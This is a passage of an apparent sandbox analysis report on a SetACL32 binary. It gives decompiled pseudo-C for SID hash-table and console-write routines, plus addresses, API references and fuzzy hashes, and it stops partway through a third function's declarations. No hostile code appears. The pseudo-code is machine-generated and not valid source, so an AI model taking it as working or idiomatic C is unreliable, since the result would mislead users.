              • String ID: ' could not be created because: $@Mhv$CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
              • API String ID: 3233469328-379314644
              • Opcode ID: 088969a62ca698ccab3a537f354493c627f91c088a76098c53e8d70bed175e62
              • Instruction ID: a7c79dc2951795ac13d87980d841a7e7227db147c1b55258d359e4b8634f34c0
              • Opcode Fuzzy Hash: 088969a62ca698ccab3a537f354493c627f91c088a76098c53e8d70bed175e62
              • Instruction Fuzzy Hash: 3C023631B20149DFDB08CF68CD85BADBB76AF94714F24835CE604AB295DB74EA84CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C99B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 173COMMON
              Download Yara Rule
              C-Code - Quality: 71%
              			E012C99B0(signed int __ecx, void** _a4, intOrPtr _a8) {
				intOrPtr* _v0;
				void*** _v8;
				void*** _v12;
				void _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _t95;
				void* _t97;
				intOrPtr* _t98;
				void* _t100;
				intOrPtr* _t104;
				intOrPtr* _t105;
				void** _t112;
				void** _t118;
				void* _t119;
				void* _t121;
				void* _t126;
				void _t130;
				signed int _t132;
				void** _t133;
				void*** _t137;
				void* _t138;
				void _t139;
				signed int _t141;
				intOrPtr _t142;
				void* _t148;
				void* _t149;
				void* _t151;
				void _t152;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t159;
				void** _t165;
				intOrPtr* _t169;
				void* _t175;
				void* _t176;
				void* _t177;

				_t141 = __ecx;
				_t132 = __ecx;
				asm("bsr ecx, eax");
				_v20 = __ecx;
				if(_a4 > 1 << __ecx) {
					_push("invalid hash bucket count");
					E012CA09E();
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t142 =  *((intOrPtr*)(_t141 + 4));
					_t95 =  *((intOrPtr*)(_t141 + 0xc)) + ( *(_t141 + 0x18) & _v24) * 8;
					_push(1);
					_t169 =  *((intOrPtr*)(_t95 + 4));
					if(_t169 != _t142) {
						_push(_t132);
						_t133 = _a4;
						_push(_t160);
						_a8 =  *_t95;
						while(1) {
							_t97 =  *_t133;
							if(_t97 == 0 || IsValidSid(_t97) == 0) {
								goto L35;
							}
							_t100 =  *(_t169 + 8);
							if(_t100 == 0 || IsValidSid(_t100) == 0 || (EqualSid( *_t133,  *(_t169 + 8)) & 0xffffff00 | _t102 != 0x00000000) == 0) {
								goto L35;
							} else {
								_t104 = _v0;
								 *((intOrPtr*)(_t104 + 4)) = _t169;
								 *_t104 =  *_t169;
								return _t104;
							}
							goto L39;
							L35:
							if(_t169 == _a8) {
								_t98 = _v0;
								 *_t98 = _t169;
								 *((intOrPtr*)(_t98 + 4)) = 0;
								return _t98;
							} else {
								_t169 =  *((intOrPtr*)(_t169 + 4));
								continue;
							}
							goto L39;
						}
					} else {
						_t105 = _v0;
						 *_t105 = _t142;
						 *((intOrPtr*)(_t105 + 4)) = 0;
						return _t105;
					}
				} else {
					asm("bsr ecx, eax");
					_v8 =  *(__ecx + 4);
					_t173 = 1 << __ecx + 1;
					_t7 = _t132 + 0xc; // 0xc
					E012BDCC0(_t7, 2,  *(__ecx + 4));
					_t9 = _t173 - 1; // 0x0
					 *(__ecx + 0x1c) = 1 << __ecx + 1;
					 *((intOrPtr*)(__ecx + 0x18)) = _t9;
					_t165 =  *( *(__ecx + 4));
					_t112 = _t165;
					if(_t165 != _v8) {
						do {
							_a4 =  *_t112;
							_t137 =  *((intOrPtr*)(_t132 + 0xc)) + ( *(_t132 + 0x18) & E012C8BB0( &(_t165[2]))) * 8;
							_v12 = _t137;
							if( *_t137 != _v8) {
								_t148 = _t165[2];
								_t118 =  &(_t165[2]);
								_t175 = _t137[1];
								if(_t148 == 0) {
									L13:
									if( *_t137 == _t175) {
										L23:
										_t138 = _t165[1];
										_t112 = _a4;
										 *_t138 = _t112;
										_t61 =  &(_t112[1]); // 0xcf8b0846
										_t157 =  *_t61;
										 *_t157 = _t175;
										_t149 =  *(_t175 + 4);
										 *_t149 = _t165;
										 *(_t175 + 4) = _t157;
										_t112[1] = _t138;
										_t165[1] = _t149;
										 *_v12 = _t165;
									} else {
										while(1) {
											_t119 =  *_t118;
											_t175 =  *(_t175 + 4);
											if(_t119 == 0 || IsValidSid(_t119) == 0) {
												goto L20;
											}
											L17:
											_t121 =  *(_t175 + 8);
											if(_t121 == 0 || IsValidSid(_t121) == 0 || (EqualSid(_t165[2],  *(_t175 + 8)) & 0xffffff00 | _t123 != 0x00000000) == 0) {
												goto L20;
											} else {
												_t139 =  *_t175;
												_t176 = _t165[1];
												_t112 = _a4;
												 *_t176 = _t112;
												_t54 =  &(_t112[1]); // 0xcf8b0846
												_t158 =  *_t54;
												 *_t158 = _t139;
												_t151 =  *(_t139 + 4);
												 *_t151 = _t165;
												 *(_t139 + 4) = _t158;
												_t112[1] = _t176;
												_t165[1] = _t151;
											}
											goto L24;
											L20:
											if( *_t137 == _t175) {
												goto L23;
											} else {
												_t118 =  &(_t165[2]);
												_t119 =  *_t118;
												_t175 =  *(_t175 + 4);
												if(_t119 == 0 || IsValidSid(_t119) == 0) {
													goto L20;
												}
											}
											goto L24;
										}
									}
								} else {
									if(IsValidSid(_t148) == 0) {
										L12:
										_t118 =  &(_t165[2]);
										goto L13;
									} else {
										_t126 =  *(_t175 + 8);
										if(_t126 == 0 || IsValidSid(_t126) == 0 || (EqualSid(_t165[2],  *(_t175 + 8)) & 0xffffff00 | _t128 != 0x00000000) == 0) {
											goto L12;
										} else {
											_t152 =  *_t175;
											_v16 = _t152;
											if(_t152 != _t165) {
												_t177 = _t165[1];
												_t130 = _a4;
												 *_t177 = _t130;
												_t36 = _t130 + 4; // 0xcf8b0846
												_t159 =  *_t36;
												 *_t159 = _t152;
												_t153 =  *(_t152 + 4);
												 *_t153 = _t165;
												 *(_v16 + 4) = _t159;
												_t137 = _v12;
												 *(_t130 + 4) = _t177;
												_t165[1] = _t153;
											}
											_t112 = _a4;
											_t137[1] = _t165;
										}
									}
								}
							} else {
								_t112 = _a4;
								 *_t137 = _t165;
								_t137[1] = _t165;
							}
							L24:
							_t165 = _t112;
							_t132 = _v20;
						} while (_t112 != _v8);
					}
					return _t112;
				}
				L39:
			}









































              0x012c99b0
              0x012c99bf
              0x012c99c1
              0x012c99ca
              0x012c99d4
              0x012c9b5a
              0x012c9b5f
              0x012c9b64
              0x012c9b65
              0x012c9b66
              0x012c9b67
              0x012c9b68
              0x012c9b69
              0x012c9b6a
              0x012c9b6b
              0x012c9b6c
              0x012c9b6d
              0x012c9b6e
              0x012c9b6f
              0x012c9b7c
              0x012c9b7f
              0x012c9b82
              0x012c9b83
              0x012c9b88
              0x012c9b9d
              0x012c9b9e
              0x012c9ba1
              0x012c9ba8
              0x012c9bb0
              0x012c9bb0
              0x012c9bb4
              0x00000000
              0x00000000
              0x012c9bbd
              0x012c9bc2
              0x00000000
              0x012c9be9
              0x012c9be9
              0x012c9bf0
              0x012c9bf3
              0x012c9bf7
              0x012c9bf7
              0x00000000
              0x012c9bdf
              0x012c9be2
              0x012c9bfa
              0x012c9bff
              0x012c9c01
              0x012c9c0a
              0x012c9be4
              0x012c9be4
              0x00000000
              0x012c9be4
              0x00000000
              0x012c9be2
              0x012c9b8a
              0x012c9b8a
              0x012c9b8e
              0x012c9b90
              0x012c9b98
              0x012c9b98
              0x012c99da
              0x012c99df
              0x012c99e6
              0x012c99ec
              0x012c99ee
              0x012c99f5
              0x012c99fa
              0x012c99fd
              0x012c9a00
              0x012c9a06
              0x012c9a08
              0x012c9a0d
              0x012c9a13
              0x012c9a15
              0x012c9a29
              0x012c9a2f
              0x012c9a34
              0x012c9a43
              0x012c9a46
              0x012c9a49
              0x012c9a4e
              0x012c9aba
              0x012c9abc
              0x012c9b23
              0x012c9b23
              0x012c9b26
              0x012c9b29
              0x012c9b2b
              0x012c9b2b
              0x012c9b2e
              0x012c9b30
              0x012c9b33
              0x012c9b35
              0x012c9b38
              0x012c9b3b
              0x012c9b41
              0x00000000
              0x012c9ac0
              0x012c9ac0
              0x012c9ac2
              0x012c9ac7
              0x00000000
              0x00000000
              0x012c9ad4
              0x012c9ad4
              0x012c9ad9
              0x00000000
              0x012c9b04
              0x012c9b04
              0x012c9b06
              0x012c9b09
              0x012c9b0c
              0x012c9b0e
              0x012c9b0e
              0x012c9b11
              0x012c9b13
              0x012c9b16
              0x012c9b18
              0x012c9b1b
              0x012c9b1e
              0x012c9b1e
              0x00000000
              0x012c9afb
              0x012c9afd
              0x00000000
              0x012c9aff
              0x012c9aff
              0x012c9ac0
              0x012c9ac2
              0x012c9ac7
              0x00000000
              0x00000000
              0x012c9ac7
              0x00000000
              0x012c9afd
              0x012c9ac0
              0x012c9a50
              0x012c9a59
              0x012c9ab7
              0x012c9ab7
              0x00000000
              0x012c9a5b
              0x012c9a5b
              0x012c9a60
              0x00000000
              0x012c9a82
              0x012c9a82
              0x012c9a84
              0x012c9a89
              0x012c9a8b
              0x012c9a8e
              0x012c9a94
              0x012c9a96
              0x012c9a96
              0x012c9a99
              0x012c9a9b
              0x012c9a9e
              0x012c9aa0
              0x012c9aa3
              0x012c9aa6
              0x012c9aa9
              0x012c9aa9
              0x012c9aac
              0x012c9aaf
              0x012c9aaf
              0x012c9a60
              0x012c9a59
              0x012c9a36
              0x012c9a36
              0x012c9a39
              0x012c9a3b
              0x012c9a3b
              0x012c9b43
              0x012c9b43
              0x012c9b45
              0x012c9b48
              0x012c9a13
              0x012c9b57
              0x012c9b57
              0x00000000

              APIs
              • std::_Xinvalid_argument.LIBCPMT ref: 012C9B5F
                • Part of subcall function 012C8BB0: IsValidSid.ADVAPI32(012C9605,00000000,00000000,00000000,00000000,00000000,000000FF,?,012C9605,00000000,?,?), ref: 012C8BC8
                • Part of subcall function 012C8BB0: GetLengthSid.ADVAPI32(00000000,012C9605,?,012C9605,00000000,?,?), ref: 012C8BD9
              • IsValidSid.ADVAPI32(04444444,04444444,?,?,00000000,00000000,?,?,?,012C98C1,?), ref: 012C9A51
              • IsValidSid.ADVAPI32(04444444,?,?,012C98C1,?,?,?,?,?,?,000000FF), ref: 012C9A63
              • EqualSid.ADVAPI32(04444444,04444444,?,?,012C98C1,?,?,?,?,?,?,000000FF), ref: 012C9A73
              Strings
              • invalid hash bucket count, xrefs: 012C9B5A
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Valid$EqualLengthXinvalid_argumentstd::_
              • String ID: invalid hash bucket count
              • API String ID: 3085321682-1101463472
              • Opcode ID: 3bb35f3a336f09226726eb0d7206bc1452b58780bed2c864df724cddf622836b
              • Instruction ID: 86c13400e6bf4d5f421c2964200f1934deed8e9349fa0b39c63e1935ce68bf77
              • Opcode Fuzzy Hash: 3bb35f3a336f09226726eb0d7206bc1452b58780bed2c864df724cddf622836b
              • Instruction Fuzzy Hash: 58613774610206EFDF10CF29C480A59FBF4BF48B0430486ADEA59DB715D770E981CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E0F61 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 318fileCOMMON
              Download Yara Rule
              C-Code - Quality: 66%
              			E012E0F61(void* __eflags, intOrPtr _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				struct _OVERLAPPED* _t243;
				void* _t244;
				signed int _t247;
				intOrPtr _t250;
				signed char _t253;
				signed int _t254;
				signed char _t256;
				struct _OVERLAPPED* _t257;
				intOrPtr _t259;
				void* _t263;
				signed char _t264;
				void* _t265;
				void* _t267;
				long _t270;
				void* _t272;
				signed int _t274;
				long _t275;
				struct _OVERLAPPED* _t276;
				signed int _t278;
				intOrPtr _t280;
				void* _t282;
				signed int _t283;
				signed int _t286;
				long _t287;
				long _t288;
				signed char _t289;
				intOrPtr _t290;
				signed int _t292;
				signed int _t294;
				void* _t295;
				void* _t297;

				_t292 = _t294;
				_t295 = _t294 - 0x8c;
				_t172 =  *0x1309018; // 0xedd8d3b4
				_v8 = _t172 ^ _t292;
				_t174 = _a8;
				_t264 = _a12;
				_t278 = (_t174 & 0x0000003f) * 0x38;
				_t247 = _t174 >> 6;
				_v112 = _t264;
				_v84 = _t247;
				_v80 = _t278;
				_t280 = _a16 + _t264;
				_v116 =  *((intOrPtr*)(_t278 +  *((intOrPtr*)(0x130b340 + _t247 * 4)) + 0x18));
				_v104 = _t280;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E012D14C0( &_v72, _t264, 0);
				asm("stosd");
				_t250 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t250;
				asm("stosd");
				asm("stosd");
				_t270 = _v112;
				_v40 = _t270;
				if(_t270 >= _t280) {
					L53:
					__eflags = _v60 - _t243;
				} else {
					_t283 = _v92;
					while(1) {
						_v47 =  *_t270;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x130b340 + _v84 * 4));
						_v52 = _t186;
						if(_t250 != 0xfde9) {
							goto L24;
						}
						_t264 = _v80;
						_t212 = _t186 + 0x2e + _t264;
						_t257 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t257)) != _t243) {
							_t257 =  &(_t257->Internal);
							if(_t257 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t274 = _v104 - _t213;
						_v44 = _t257;
						if(_t257 <= 0) {
							_t259 =  *((char*)(( *_t213 & 0x000000ff) + 0x1309870)) + 1;
							_v52 = _t259;
							__eflags = _t259 - _t274;
							if(_t259 > _t274) {
								__eflags = _t274;
								if(_t274 <= 0) {
									goto L45;
								} else {
									_t287 = _v40;
									do {
										_t265 = _t243 + _t264;
										_t216 =  *((intOrPtr*)(_t243 + _t287));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t265 +  *((intOrPtr*)(0x130b340 + _v84 * 4)) + 0x2e)) = _t216;
										_t264 = _v80;
										__eflags = _t243 - _t274;
									} while (_t243 < _t274);
									goto L44;
								}
							} else {
								_t275 = _v40;
								__eflags = _t259 - 4;
								_v144 = _t243;
								_t261 =  &_v144;
								_v140 = _t243;
								_v56 = _t275;
								_t219 = (0 | _t259 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L22;
							}
						} else {
							_t228 =  *((char*)(( *(_t264 + _v52 + 0x2e) & 0x000000ff) + 0x1309870)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t257;
							_v52 = _t229;
							if(_t229 > _t274) {
								__eflags = _t274;
								if(_t274 > 0) {
									_t288 = _v40;
									do {
										_t267 = _t243 + _t264 + _t257;
										_t231 =  *((intOrPtr*)(_t243 + _t288));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t267 +  *((intOrPtr*)(0x130b340 + _v84 * 4)) + 0x2e)) = _t231;
										_t257 = _v44;
										_t264 = _v80;
										__eflags = _t243 - _t274;
									} while (_t243 < _t274);
									L44:
									_t283 = _v92;
								}
								L45:
								_t286 = _t283 + _t274;
								__eflags = _t286;
								L46:
								__eflags = _v60;
								_v92 = _t286;
							} else {
								_t264 = _t243;
								if(_t257 > 0) {
									_t290 = _v108;
									do {
										 *((char*)(_t292 + _t264 - 0xc)) =  *((intOrPtr*)(_t290 + _t264));
										_t264 = _t264 + 1;
									} while (_t264 < _t257);
									_t229 = _v52;
								}
								_t275 = _v40;
								if(_t229 > 0) {
									E012CC800( &_v16 + _t257, _t275, _v52);
									_t257 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t257 > 0) {
									_t264 = _v44;
									_t276 = _t243;
									_t289 = _v80;
									do {
										_t263 = _t276 + _t289;
										_t276 =  &(_t276->Internal);
										 *(_t263 +  *((intOrPtr*)(0x130b340 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t276 < _t264);
									_t275 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t261 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L22:
								_push(_t220);
								_push( &_v76);
								_t222 = E012E1A1A(_t261);
								_t297 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L53;
								} else {
									_t270 = _t275 + _v52 - 1;
									L32:
									_t270 = _t270 + 1;
									_v40 = _t270;
									_t193 = E012DF2D2(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t297 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L53;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L52:
											_v96 = GetLastError();
											goto L53;
										} else {
											_t283 = _v88 - _v112 + _t270;
											_v92 = _t283;
											if(_v100 < _v56) {
												goto L53;
											} else {
												if(_v47 != 0xa) {
													L39:
													if(_t270 >= _v104) {
														goto L53;
													} else {
														_t250 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L52;
													} else {
														if(_v100 < 1) {
															goto L53;
														} else {
															_v88 = _v88 + 1;
															_t283 = _t283 + 1;
															_v92 = _t283;
															goto L39;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L54;
						L24:
						_t253 = _v80;
						_t264 =  *((intOrPtr*)(_t253 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t270;
							_t188 = E012D53A4(_t264);
							_t254 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t254 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t254 * 2)) >= _t243) {
								_push(1);
								_push(_t270);
								goto L31;
							} else {
								_t202 = _t270 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t264 = _v84;
									_t256 = _v80;
									 *((char*)(_t256 +  *((intOrPtr*)(0x130b340 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t256 +  *((intOrPtr*)(0x130b340 + _t264 * 4)) + 0x2d) =  *(_t256 +  *((intOrPtr*)(0x130b340 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t286 = _t283 + 1;
									goto L46;
								} else {
									_t206 = E012DB193( &_v76, _t270, 2);
									_t297 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L53;
									} else {
										_t270 = _v56;
										goto L32;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t253 + _t186 + 0x2e));
							_v23 =  *_t270;
							_push(2);
							 *(_t253 + _v52 + 0x2d) = _t264;
							_push( &_v24);
							L31:
							_push( &_v76);
							_t190 = E012DB193();
							_t297 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L53;
							} else {
								goto L32;
							}
						}
						goto L54;
					}
				}
				L54:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t292;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_pop(_t272);
				_pop(_t282);
				_pop(_t244);
				return E012CAE19(_a4, _t244, _v8 ^ _t292, _t264, _t272, _t282);
			}



























































































              0x012e0f64
              0x012e0f66
              0x012e0f6c
              0x012e0f73
              0x012e0f76
              0x012e0f7b
              0x012e0f83
              0x012e0f86
              0x012e0f8a
              0x012e0f8d
              0x012e0f97
              0x012e0fa1
              0x012e0fa3
              0x012e0fa6
              0x012e0fa9
              0x012e0faf
              0x012e0fb1
              0x012e0fb8
              0x012e0fc5
              0x012e0fc6
              0x012e0fc9
              0x012e0fcc
              0x012e0fcd
              0x012e0fce
              0x012e0fd1
              0x012e0fd6
              0x012e12e2
              0x012e12e2
              0x012e0fdc
              0x012e0fdc
              0x012e0fdf
              0x012e0fe1
              0x012e0fe7
              0x012e0fea
              0x012e0ff1
              0x012e0ff8
              0x012e1001
              0x00000000
              0x00000000
              0x012e1007
              0x012e100d
              0x012e100f
              0x012e1011
              0x012e1014
              0x012e1019
              0x012e101d
              0x00000000
              0x00000000
              0x00000000
              0x012e101d
              0x012e1022
              0x012e1025
              0x012e1027
              0x012e102c
              0x012e10de
              0x012e10df
              0x012e10e2
              0x012e10e4
              0x012e1292
              0x012e1294
              0x00000000
              0x012e1296
              0x012e1296
              0x012e1299
              0x012e129c
              0x012e12a5
              0x012e12a8
              0x012e12a9
              0x012e12ad
              0x012e12b0
              0x012e12b0
              0x00000000
              0x012e12b4
              0x012e10ea
              0x012e10ea
              0x012e10ef
              0x012e10f2
              0x012e10f8
              0x012e10fe
              0x012e1107
              0x012e110a
              0x012e110a
              0x012e110b
              0x012e110c
              0x012e110f
              0x012e1110
              0x00000000
              0x012e1110
              0x012e1032
              0x012e1041
              0x012e1042
              0x012e1045
              0x012e1047
              0x012e104c
              0x012e125d
              0x012e125f
              0x012e1261
              0x012e1264
              0x012e1269
              0x012e1272
              0x012e1275
              0x012e1276
              0x012e127a
              0x012e127d
              0x012e1280
              0x012e1280
              0x012e1284
              0x012e1284
              0x012e1284
              0x012e1287
              0x012e1287
              0x012e1287
              0x012e1289
              0x012e1289
              0x012e128d
              0x012e1052
              0x012e1052
              0x012e1056
              0x012e1058
              0x012e105b
              0x012e105e
              0x012e1062
              0x012e1063
              0x012e1067
              0x012e1067
              0x012e106a
              0x012e106f
              0x012e107b
              0x012e1080
              0x012e1083
              0x012e1083
              0x012e1088
              0x012e108a
              0x012e108d
              0x012e108f
              0x012e1092
              0x012e1095
              0x012e1098
              0x012e10a0
              0x012e10a4
              0x012e10a8
              0x012e10a8
              0x012e10ae
              0x012e10b4
              0x012e10b7
              0x012e10bf
              0x012e10c6
              0x012e10ca
              0x012e10cb
              0x012e10ce
              0x012e10cf
              0x012e1113
              0x012e1113
              0x012e1117
              0x012e1118
              0x012e111d
              0x012e1123
              0x00000000
              0x012e1129
              0x012e112d
              0x012e11b6
              0x012e11bd
              0x012e11c5
              0x012e11cd
              0x012e11d2
              0x012e11d5
              0x012e11da
              0x00000000
              0x012e11e0
              0x012e11f5
              0x012e12d9
              0x012e12df
              0x00000000
              0x012e11fb
              0x012e1204
              0x012e1206
              0x012e120c
              0x00000000
              0x012e1212
              0x012e1216
              0x012e124c
              0x012e124f
              0x00000000
              0x012e1255
              0x012e1255
              0x00000000
              0x012e1255
              0x012e1218
              0x012e121a
              0x012e121c
              0x012e1235
              0x00000000
              0x012e123b
              0x012e123f
              0x00000000
              0x012e1245
              0x012e1245
              0x012e1248
              0x012e1249
              0x00000000
              0x012e1249
              0x012e123f
              0x012e1235
              0x012e1216
              0x012e120c
              0x012e11f5
              0x012e11da
              0x012e1123
              0x012e104c
              0x00000000
              0x012e1134
              0x012e1134
              0x012e1137
              0x012e113b
              0x012e113e
              0x012e1160
              0x012e1163
              0x012e1168
              0x012e116c
              0x012e1170
              0x012e119e
              0x012e11a0
              0x00000000
              0x012e1172
              0x012e1172
              0x012e1175
              0x012e1178
              0x012e117b
              0x012e12b6
              0x012e12b9
              0x012e12c6
              0x012e12d1
              0x012e12d6
              0x00000000
              0x012e1181
              0x012e1188
              0x012e118d
              0x012e1190
              0x012e1193
              0x00000000
              0x012e1199
              0x012e1199
              0x00000000
              0x012e1199
              0x012e1193
              0x012e117b
              0x012e1140
              0x012e1144
              0x012e1147
              0x012e114c
              0x012e1152
              0x012e1154
              0x012e115b
              0x012e11a1
              0x012e11a4
              0x012e11a5
              0x012e11aa
              0x012e11ad
              0x012e11b0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012e11b0
              0x00000000
              0x012e113e
              0x012e0fdf
              0x012e12e5
              0x012e12e5
              0x012e12e7
              0x012e12ea
              0x012e12ea
              0x012e12ea
              0x012e12ea
              0x012e12fc
              0x012e12fe
              0x012e12ff
              0x012e1300
              0x012e1301
              0x012e1302
              0x012e1303
              0x012e130a

              APIs
              • GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 012E0FA9
              • __fassign.LIBCMT ref: 012E1188
              • __fassign.LIBCMT ref: 012E11A5
              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 012E11ED
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 012E122D
              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 012E12D9
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: FileWrite__fassign$ConsoleErrorLast
              • String ID: @Mhv
              • API String ID: 4031098158-3595611156
              • Opcode ID: 5b7657354456a2ae461bfdea6b2a7156a7af96998e266e882bb1d9e45554f733
              • Instruction ID: a0a5e8bb43cae8c563b4d606f42424cbb4c6029747e0d147f9d7fe9cb62f685c
              • Opcode Fuzzy Hash: 5b7657354456a2ae461bfdea6b2a7156a7af96998e266e882bb1d9e45554f733
              • Instruction Fuzzy Hash: E2D1BAB1E102999FCF15CFE8C8849EDBBF5BF48314F28016AE916FB245D631A916CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A9DB0 Relevance: 10.7, APIs: 7, Instructions: 167synchronizationCOMMON
              Download Yara Rule
              C-Code - Quality: 64%
              			E012A9DB0(void* __ebx, signed int __ecx, void* __edi, void* __fp0) {
				char* _v0;
				intOrPtr _v4;
				char _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				int _v44;
				signed int _v48;
				intOrPtr _v52;
				int _v64;
				long _v68;
				signed int _v72;
				int _v76;
				short _v92;
				signed int _v96;
				intOrPtr _v100;
				char _v116;
				signed int _v120;
				intOrPtr _v124;
				char _v140;
				char _v296;
				char _v297;
				void* _v304;
				signed int _v308;
				void _v312;
				union _LARGE_INTEGER _v316;
				long _v320;
				signed int _v324;
				long _v328;
				WCHAR* _v332;
				struct _CRITICAL_SECTION* _v336;
				intOrPtr _v340;
				char* _v344;
				char* _v348;
				intOrPtr _v352;
				char _v356;
				int _v372;
				void* __esi;
				void* __ebp;
				signed int _t340;
				signed int _t341;
				int _t353;
				int _t362;
				int _t363;
				signed char _t364;
				intOrPtr _t372;
				int _t379;
				int _t380;
				intOrPtr _t386;
				intOrPtr _t390;
				intOrPtr _t394;
				intOrPtr _t398;
				intOrPtr _t401;
				intOrPtr _t404;
				signed int _t417;
				int _t418;
				signed char _t420;
				signed int _t423;
				int _t427;
				int _t429;
				signed char _t431;
				signed char _t432;
				void _t436;
				int _t438;
				void _t443;
				int _t445;
				int _t457;
				void* _t458;
				struct _OVERLAPPED* _t460;
				int _t461;
				int _t470;
				int _t471;
				int _t473;
				long _t481;
				void* _t485;
				long _t495;
				intOrPtr* _t499;
				intOrPtr* _t502;
				signed int _t505;
				void* _t507;
				long _t510;
				void* _t514;
				long _t517;
				void* _t524;
				signed int _t525;
				int _t528;
				int _t537;
				void* _t538;
				int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				void* _t551;
				int _t552;
				int _t554;
				void* _t555;
				void* _t556;
				void* _t557;
				intOrPtr _t558;
				intOrPtr _t559;
				intOrPtr _t560;
				long _t561;
				long _t564;
				int _t570;
				int* _t571;
				int _t577;
